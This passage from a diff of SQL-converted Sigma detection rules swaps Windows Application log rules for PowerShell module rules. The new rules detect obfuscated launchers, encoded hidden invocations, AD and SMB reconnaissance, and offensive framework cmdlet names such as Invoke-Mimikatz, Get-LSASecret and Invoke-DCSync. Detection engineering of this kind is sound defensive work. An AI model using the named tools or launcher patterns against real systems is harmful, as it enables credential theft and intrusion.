ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Application Uninstalled", - "id": "570ae5ec-33dc-427c-b815-db86228ad43e", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "An application has been removed. Check if it is critical.", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_builtin_remove_application.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious Get Information for SMB Share - PowerShell Module", + "id": "6942bd25-5970-40ab-af49-944247103358", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_smb_share_reco.yml" }, { - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", + "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Administrator script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_susp_ad_group_reco.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "status": "test", - "description": "Detects backup catalog deletions", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection)", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", "status": "experimental", - "description": "Detects MSI package installation from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND (Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\\\\\\\*' ESCAPE '\\')) AND NOT ((Data LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\') OR (Data LIKE '%C:\\\\Windows\\\\TEMP\\\\UpdHealthTools.msi%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_msi_install_from_susp_locations.yml" + "filename": "posh_pm_invoke_obfuscation_via_compress.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE 